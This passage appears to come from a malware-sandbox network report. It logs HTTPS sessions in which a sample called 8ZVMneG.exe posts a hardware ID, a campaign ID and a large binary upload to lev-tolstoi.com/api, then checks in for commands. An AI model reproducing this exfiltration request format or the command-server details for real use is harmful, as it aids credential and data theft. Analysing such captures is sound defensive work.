                                                                                                                                                                                                                                                                2024-12-20 06:04:24 UTC4645OUTData Raw: 66 a5 31 16 55 bb 32 f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09
                                                                                                                                                                                                                                                                Data Ascii: f1U2+?2+?2+?o?Mp5
                                                                                                                                                                                                                                                                2024-12-20 06:04:25 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:04:25 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=vud0evm3o4tirshmk09nas09m0; expires=Mon, 14 Apr 2025 23:51:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W3q9aNEuLvTl13XpqTwTjlcsO2BV%2F9jRacfGMhRTbKU7aX3f2iAG1Uo5lediT5aC%2BFUMz8AQaqkLbwJh3LYZskN7bOmC92F7uaF7MXytemxbtd9cr1maZMB8cBJ3ZSMGgLo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f4d6f4f49546a55-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2341&min_rtt=2333&rtt_var=892&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=20938&delivery_rate=1215147&cwnd=235&unsent_bytes=0&cid=8c13936f6ced037e&ts=981&x=0"
                                                                                                                                                                                                                                                                2024-12-20 06:04:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                2024-12-20 06:04:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                8192.168.2.649765104.21.66.864432144C:\Users\user\Desktop\8ZVMneG.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-20 06:04:27 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=1NBWOHGWMH0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 1184
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-20 06:04:27 UTC1184OUTData Raw: 2d 2d 31 4e 42 57 4f 48 47 57 4d 48 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 45 33 39 46 43 46 42 44 38 33 43 43 45 34 41 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 31 4e 42 57 4f 48 47 57 4d 48 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 4e 42 57 4f 48 47 57 4d 48 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6e 62 67 6e 78 64 6c 78 64 6e 79 6f 0d 0a 2d 2d 31 4e 42 57 4f 48 47 57 4d 48
                                                                                                                                                                                                                                                                Data Ascii: --1NBWOHGWMH0Content-Disposition: form-data; name="hwid"DE39FCFBD83CCE4A00D57F9DDD37BE0C--1NBWOHGWMH0Content-Disposition: form-data; name="pid"1--1NBWOHGWMH0Content-Disposition: form-data; name="lid"LPnhqo--nbgnxdlxdnyo--1NBWOHGWMH
                                                                                                                                                                                                                                                                2024-12-20 06:04:27 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:04:27 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=kfr0042hj5ngk03qg3svvooihc; expires=Mon, 14 Apr 2025 23:51:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kBWYzB%2B7Lwli9W47yxWPoNOh04rRNcfLGRXYtNheV7E8A%2FLSzYbQaUzcoBtAbpScmUV%2Bwn0anzT0jFvqqPAPvGi2aTaarawX0ogrxLQS14i0kkzd%2FRs9AItKUtlKMm%2B7U8Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f4d6f5f3ae342ea-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1572&rtt_var=599&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2093&delivery_rate=1811414&cwnd=143&unsent_bytes=0&cid=aa510be4f3d66b47&ts=774&x=0"
                                                                                                                                                                                                                                                                2024-12-20 06:04:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                2024-12-20 06:04:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                9192.168.2.649771104.21.66.864432144C:\Users\user\Desktop\8ZVMneG.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=6DZ4WE0ATJK8ZM
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 587856
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: 2d 2d 36 44 5a 34 57 45 30 41 54 4a 4b 38 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 45 33 39 46 43 46 42 44 38 33 43 43 45 34 41 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 36 44 5a 34 57 45 30 41 54 4a 4b 38 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 44 5a 34 57 45 30 41 54 4a 4b 38 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6e 62 67 6e 78 64 6c 78 64 6e 79 6f 0d 0a 2d 2d 36
                                                                                                                                                                                                                                                                Data Ascii: --6DZ4WE0ATJK8ZMContent-Disposition: form-data; name="hwid"DE39FCFBD83CCE4A00D57F9DDD37BE0C--6DZ4WE0ATJK8ZMContent-Disposition: form-data; name="pid"1--6DZ4WE0ATJK8ZMContent-Disposition: form-data; name="lid"LPnhqo--nbgnxdlxdnyo--6
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: 9a 92 74 2a 3b 98 06 54 14 79 04 c5 e4 a6 97 97 a4 5b 91 54 cf 5a 44 b0 77 a7 17 1b 1f 3e 54 44 b9 bf 77 f7 ed 8b a4 cb b5 27 68 c9 30 7f b1 40 97 d2 bf de 2f ce 52 4c 03 d5 7f 7b 28 34 0c 39 1f 5b ec 1c 71 7d 1a ed 9b e8 4e 0f 5f d7 2e e9 60 2d c6 03 dd 8c d1 dc 65 0e 01 07 ad 10 50 ae 82 94 28 13 7d f7 a1 47 1e 7a 2d a5 dd b5 66 f8 4c 14 d9 be 2b 67 c9 01 45 9e 47 75 c7 2b d3 1c 45 fb 92 b4 78 5c 0b 4d 46 2c 8a e3 59 5f a7 c7 c5 3d 72 94 b4 62 03 60 5f 1f 54 e3 86 59 36 5e 75 20 3f 35 55 8d b3 72 61 38 1c 73 97 7b 57 cf e9 34 3f 14 77 ff bc b9 3b ea 56 52 ab 24 ba 97 a0 32 14 89 54 65 ae c1 aa 9b 05 20 f9 7f 5f 78 c0 f8 66 26 a6 ce b7 93 b7 8b 91 65 18 04 65 57 72 86 06 ee 32 9a 2a 32 0f 62 e0 c5 da d2 9e 5a ea 82 b7 f7 d6 07 29 3f 58 40 e9 f9 35 39 c7
                                                                                                                                                                                                                                                                Data Ascii: t*;Ty[TZDw>TDw'h0@/RL{(49[q}N_.`-eP(}Gz-fL+gEGu+Ex\MF,Y_=rb`_TY6^u ?5Ura8s{W4?w;VR$2Te _xf&eeWr2*2bZ)?X@59
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: 2f 6a 52 0a b0 5a c7 43 c6 6e 9c 9a 86 50 e0 28 23 bf 08 03 e7 48 37 9b e8 25 b1 bf 8d b5 a6 29 37 64 29 2d 93 78 5f 48 21 39 55 f5 7a 10 9f b7 fe 03 63 fd 79 14 a2 95 7d ae 67 c8 1a db 73 0b f5 cf b4 94 8d e4 c7 69 98 68 55 60 be 8e 37 cb 09 c0 d8 e1 73 bc b0 bd 55 54 c9 5f 48 7f 3d 63 28 eb fe 52 f6 f5 32 52 42 97 e5 86 22 b8 ff 6c 1e 29 dd 00 b3 00 f2 3d d5 2a 07 21 09 d0 3c ee fd 92 93 ee 87 4e e3 e3 1a c4 c1 bc e2 6a 7c 8f 08 e1 ab a0 b8 5d 3c cf d4 ea 24 29 1d 90 b1 b1 88 3e af 21 8d 2c 60 fb fa 7d c2 e2 de 53 dd ac f6 61 74 d7 1d 71 6f ee 6d fa b6 2b 44 48 16 01 0f 03 c3 8f d9 60 1a dd 28 b0 51 3c bf 51 6d 61 87 61 a3 be 12 66 4c e7 84 56 bc be c2 ed e5 d1 c9 64 dd 91 c0 07 83 81 e7 ef fe b9 b4 6b cb 3d a3 95 cd d7 02 a7 02 eb b7 27 95 87 95 23 96
                                                                                                                                                                                                                                                                Data Ascii: /jRZCnP(#H7%)7d)-x_H!9Uzcy}gsihU`7sUT_H=c(R2RB"l)=*!<Nj|]<$)>!,`}Satqom+DH`(Q<QmaafLVdk='#
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: 13 d7 db 5d bd 57 5c ad d3 1e 65 e6 ad 7a 4d 0d 0c 9f 2f 7d 06 57 d1 cd 03 b3 c6 c9 1c 63 6f 81 e4 11 db ea 85 53 31 ec fd 3b a1 61 7b b8 aa b0 10 17 05 c5 8c 47 ba c0 a5 1d 0e d8 c9 17 bc be 47 33 bf 90 1a 7f 6b 03 22 8c ed 2e 09 de 60 26 07 03 0e 24 9c d0 fd 23 f4 cf e8 9a ef 04 88 e3 38 bd f2 05 a2 00 ae fb fe 84 22 0c 8c 7c 36 05 c4 5e 1f d3 d3 41 5f 60 e4 d8 33 13 01 6b 4b 59 c1 a5 fb 47 ff 09 29 06 f6 e7 a7 8b 07 b3 8e 64 29 74 6b 80 e3 0f 9b 57 02 ca 56 e5 b3 ca 8e 10 07 6a 67 96 26 be e8 03 2c a5 9e fb 82 a7 d9 b5 c6 7c 8c d5 b8 d4 f8 bb ac 3d a5 e1 45 be e5 75 08 94 d2 4a e4 4f 73 32 d1 d4 b1 d1 d0 f7 2a 09 a7 9b 9b 48 8c ae e0 8f 30 62 6d 80 53 e2 8a 43 9b 22 3b 16 46 1d 41 86 87 42 13 04 0b a1 5a 77 33 6a b8 30 58 3b 44 a9 f8 7c 50 1b be 73 05
                                                                                                                                                                                                                                                                Data Ascii: ]W\ezM/}WcoS1;a{GG3k".`&$#8"|6^A_`3kKYG)d)tkWVjg&,|=EuJOs2*H0bmSC";FABZw3j0X;D|Ps
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: c7 c3 15 5d 9a ef c7 2f 51 db 71 86 17 c0 f7 a5 2c 42 47 dd 71 fa a5 d6 f0 40 3b 34 e6 ed 97 7e db 61 92 bf 71 46 1b 6f aa 2c e8 53 3a 9a 7a 0a 68 94 66 29 80 82 cc 17 a1 91 a8 97 69 39 2c a6 57 55 36 ee ed 1b 08 2b c3 0e 2e f1 54 4e 44 ba cd b7 35 f3 f7 6e dc 08 9e 70 dd 25 d9 77 cc a0 c0 ec 00 ee b5 02 01 f7 0e db 61 a2 8b 00 b0 96 6d 5e 60 f6 47 21 12 4e 4e a3 d6 7a 02 da 05 44 c4 8d 0c af be 15 9a 15 20 da 26 15 58 83 02 7b 57 a2 52 c6 55 32 d5 10 d7 a7 02 72 8f c8 14 ec 02 76 27 d2 08 a6 70 aa 09 99 90 dd 8b f1 aa f9 41 58 ed 8e 53 24 8a 0b f2 f1 5d 42 91 87 23 a8 4e 53 5c 93 9f 64 69 f1 5a e2 be d0 32 03 8c ae ff ad 37 47 b0 76 dc 3a 7e 93 cb 20 25 cb e4 27 78 8b 41 f0 02 3f 1e e2 b3 20 32 1f 1b 20 d4 b0 eb 67 89 67 27 de b8 1e e1 5b 58 61 c5 29 79
                                                                                                                                                                                                                                                                Data Ascii: ]/Qq,BGq@;4~aqFo,S:zhf)i9,WU6+.TND5np%wam^`G!NNzD &X{WRU2rv'pAXS$]B#NS\diZ27Gv:~ %'xA? 2 gg'[Xa)y
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: 68 28 82 af 7c 9e 49 6c 8c 96 89 e7 09 d3 e9 94 9a 93 fb 7d 27 7b 15 8b 5f 15 09 4e f9 a0 b9 c6 b8 be 95 04 f0 f6 c6 fb ee d3 ca dd 2d a7 82 53 00 48 90 95 19 bb 38 9b 56 8c ef 0b ca 76 b5 1a e3 39 a4 d5 e4 17 c0 52 e2 93 79 b8 af 40 8b 73 53 27 19 65 e0 05 4a b7 1b 5d 67 cf 9d 61 36 ac 1d b4 f3 bc 6b 8c df 1c 7f 5f f4 a1 ba 13 72 47 34 0f 7a 78 2b ba 3d f1 3e 99 4e c2 cf e7 af 0e 57 54 ba b6 9a 1c 0b a7 8e fb ad 6c fe 7d fc 60 5c 85 6c 06 07 dc 67 30 d3 eb d3 d7 33 2b ec 34 c0 d2 23 5e 90 3f d8 ad ad be 56 cb df a5 3b bf d6 fc 4a d0 3c 74 b0 67 b2 99 1a b0 f9 9b 8d a6 e7 0f 6a 62 21 46 e2 45 66 90 f9 f6 de c2 7b f9 43 1b 15 e3 d1 da 54 e1 aa 35 66 72 2a 2f 01 cc 57 99 ab c5 0f 0e f9 3f c0 c1 cd 58 e6 2e c0 10 7f e9 28 09 98 25 1d d8 e0 0b 7c 80 26 89 a6
                                                                                                                                                                                                                                                                Data Ascii: h(|Il}'{_N-SH8Vv9Ry@sS'eJ]ga6k_rG4zx+=>NWTl}`\lg03+4#^?V;J<tgjb!FEf{CT5fr*/W?X.(%|&
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: be f2 95 2c d7 47 ab 3f 62 68 e0 1d b2 57 7e fa 47 df e4 61 14 ec c2 34 7f 5c 02 e6 2c b7 1b 84 3a 9d 95 25 22 de 74 c1 76 f3 9e 76 00 46 8d ab 27 04 40 6a f4 fc 5d 0d 69 20 a6 0b 4c 41 6b 39 f0 10 37 1a 7e 44 af de db 77 91 2e 06 02 51 9c fe 30 3a 0a 48 dc c1 8d fd e0 59 f6 83 b0 ec 5f 10 43 84 fd 2c 3e 7f ff 42 d2 f8 f6 11 32 88 5e 99 9d 8f 85 cb e5 6e a0 ec 80 bb 6c 98 18 b0 cb ce 2a 68 6d c6 5f 8a 8c 2f c7 7a 9d 7c da e6 a8 3f 67 39 52 1d 73 73 92 a7 43 12 96 12 da 23 f2 a7 37 85 a9 41 d8 2c d9 6e d3 99 21 27 8a 8a 84 c3 3d d1 e7 01 1e 62 9f 96 c2 72 11 0c 00 6d e8 30 2a f7 20 45 f4 55 b5 9f 65 c4 ae 11 ae 8e 27 ce b1 e1 98 68 1e 81 bb 7f be 1b fd d1 6d c6 fe e1 23 f7 4d 7b a4 22 11 f3 2c 17 cf 9d 9c 96 27 11 88 c6 c6 c2 3c 58 d3 36 ca 39 7e fe f2 85
                                                                                                                                                                                                                                                                Data Ascii: ,G?bhW~Ga4\,:%"tvvF'@j]i LAk97~Dw.Q0:HY_C,>B2^nl*hm_/z|?g9RssC#7A,n!'=brm0* EUe'hm#M{",'<X69~
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: d4 7d a2 39 cf 94 97 4e ef 12 26 33 1c 22 83 51 9b 60 e3 da 52 e7 c6 ab f7 dc 5b 2b e3 60 5a 14 d8 5d d8 de a9 8c f8 83 ff a1 e1 b3 f9 80 e0 93 cf 07 de ef 41 23 ee 09 48 99 04 05 b2 f8 69 6e 90 76 21 86 fa 0a 82 2b e5 d4 40 77 c2 19 50 90 da ab 09 05 1d 52 2c 10 05 7f e4 fa e4 4e fa b8 0f 3b ef 07 8d 9b db fd d3 7a f1 29 67 78 e6 df d9 cd 2c c0 56 17 e9 ef f1 5c d8 e9 ab cb 36 99 ce 3c a8 de 6c f5 9a 74 51 d9 28 10 4e 88 94 4d 8d bc c7 b5 a3 e3 e8 27 e7 7d 93 12 7c 79 86 bc 2b fe 6f 89 88 c7 4f 3f 5b fc 54 80 fc 24 b2 95 ff 18 f1 18 38 86 a8 44 a7 bf 19 a1 bc 3f 68 07 77 ca 30 64 67 77 a0 ae 9d 8e 47 91 78 34 50 17 44 6a c7 ac fd d0 e7 66 00 d1 45 1e a1 9c 6b 3a 6a 84 ae 18 b8 94 fc fa c9 53 56 d6 6e 85 49 3e cc 16 7a de ba 31 4b 3d 89 9c 34 26 c6 d5 99
                                                                                                                                                                                                                                                                Data Ascii: }9N&3"Q`R[+`Z]A#Hinv!+@wPR,N;z)gx,V\6<ltQ(NM'}|y+oO?[T$8D?hw0dgwGx4PDjfEk:jSVnI>z1K=4&
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: 5f 6e 60 ab fd 34 4c 6a 1f 5c 0a 37 2c 14 f0 b8 b7 10 0b 98 d8 a1 6f 2f ca 94 35 12 af af 16 50 12 60 aa b5 d1 89 30 9d 3e b4 a2 c6 00 b4 8c 3b 34 01 d0 ec 24 37 b6 2e 7f f7 5e 77 68 d2 f2 78 5c 7e 8e 5d ca 95 cf c5 cb 82 21 ad 93 a3 e1 27 17 1e bf db 8d 28 6b a9 bf 34 fa f9 56 ab e0 4b d4 e5 82 9b 0b ab 8b 64 22 72 e1 7f 8f 5a 96 21 17 9d fb b6 18 cd 72 47 c6 be 13 3e 5f fe 9c cd d3 7a 33 9a 93 f0 9d bd 31 9a 48 5b 51 64 ec 60 29 78 10 87 c7 26 67 29 c1 1f 54 18 ec 5f dc 38 74 5a 14 9c aa 26 66 9e b9 67 c2 f3 94 63 fd d0 94 17 9c 4c 3d 98 97 c3 b7 d0 b6 e8 e6 48 7d b3 55 12 3d bf fa 8a c0 9b 2c 7e e3 db 75 98 19 ad ee b1 e7 d5 c8 fb 2a 5b 44 f6 61 3b 0d ee 2f eb 30 aa 2a f8 a0 d3 a5 87 44 e2 62 d5 aa b9 26 ec 98 36 95 a3 df 5f be f5 b9 75 e1 40 50 c6 ab
                                                                                                                                                                                                                                                                Data Ascii: _n`4Lj\7,o/5P`0>;4$7.^whx\~]!'(k4VKd"rZ!rG>_z31H[Qd`)x&g)T_8tZ&fgcL=H}U=,~u*[Da;/0*Db&6_u@P
                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: ad 26 81 a6 c5 9b 62 03 ed 2f 61 23 a0 8d 40 0c cb e0 28 fa f6 77 54 3a 6f 2c ec 57 53 7a a2 90 0f cc e0 a0 32 aa 1d c5 7e 9c 8d f7 bb 66 5e 7f 71 db ff e4 85 e0 f3 57 da ec d5 b4 16 df 57 cd 42 97 ec ce 62 8d d2 0d 0a cf 95 0a 3f 98 2a 5b 35 78 ab 69 6b 2b ce 92 d5 dc c7 54 4a 77 bd 76 4a bb 4d ca e1 bc 14 9f 29 29 30 68 b9 2d 31 c6 e1 c3 9e 68 ba cf f2 ae f0 a0 77 0b 5b 10 f6 2a 3b 46 8b 66 2c 7a bf b6 68 e9 55 ba f9 b1 a1 41 74 eb b4 1c e2 5c 24 75 95 77 60 45 8a 32 8e a3 a5 1a 17 6d 16 e7 6e 14 7c 0b 48 a1 e8 73 ee bf 68 f6 c8 97 7b fe 3e 65 eb 36 3b 67 f4 43 b9 28 d7 eb 76 b9 4d 9d b4 f5 59 1b b3 f7 f4 9b a5 f3 b7 9b df bd 7a 1b 3a fd 28 a7 7d 25 44 70 91 d9 96 b5 df 32 57 4a a1 e2 8a 10 b9 dc 46 9c fb 06 71 64 fe d5 cb 29 b7 4f d6 b3 2b 12 e5 2b c9
                                                                                                                                                                                                                                                                Data Ascii: &b/a#@(wT:o,WSz2~f^qWWBb?*[5xik+TJwvJM))0h-1hw[*;Ff,zhUAt\$uw`E2mn|Hsh{>e6;gC(vMYz:(}%Dp2WJFqd)O++
                                                                                                                                                                                                                                                                2024-12-20 06:04:31 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:04:31 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=tpqia02tbr59fub1pk8se6ieij; expires=Mon, 14 Apr 2025 23:51:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1GE8XO2lSe8DEEgO2HUZvyZY67QjyFvjib7hIPyxegWFDU7HykK9RpUVUgYBGi1GUF6zxN0xNkiNIcd2sSCE9yWRZ2e06h4QV20waP6Z%2BWRuzTJfuTW92uJ5fnSxh3wRKYg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f4d6f6e6d967c93-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1814&rtt_var=686&sent=327&recv=609&lost=0&retrans=0&sent_bytes=2835&recv_bytes=590442&delivery_rate=1589548&cwnd=210&unsent_bytes=0&cid=61ed7bf4d9388229&ts=2308&x=0"


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                10192.168.2.649781104.21.66.864432144C:\Users\user\Desktop\8ZVMneG.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-20 06:04:33 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 89
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-20 06:04:33 UTC89OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 6e 62 67 6e 78 64 6c 78 64 6e 79 6f 26 6a 3d 26 68 77 69 64 3d 44 45 33 39 46 43 46 42 44 38 33 43 43 45 34 41 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43
                                                                                                                                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--nbgnxdlxdnyo&j=&hwid=DE39FCFBD83CCE4A00D57F9DDD37BE0C
                                                                                                                                                                                                                                                                2024-12-20 06:04:33 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:04:33 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=b265fsuggjdiha7mkkqiit2s0e; expires=Mon, 14 Apr 2025 23:51:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
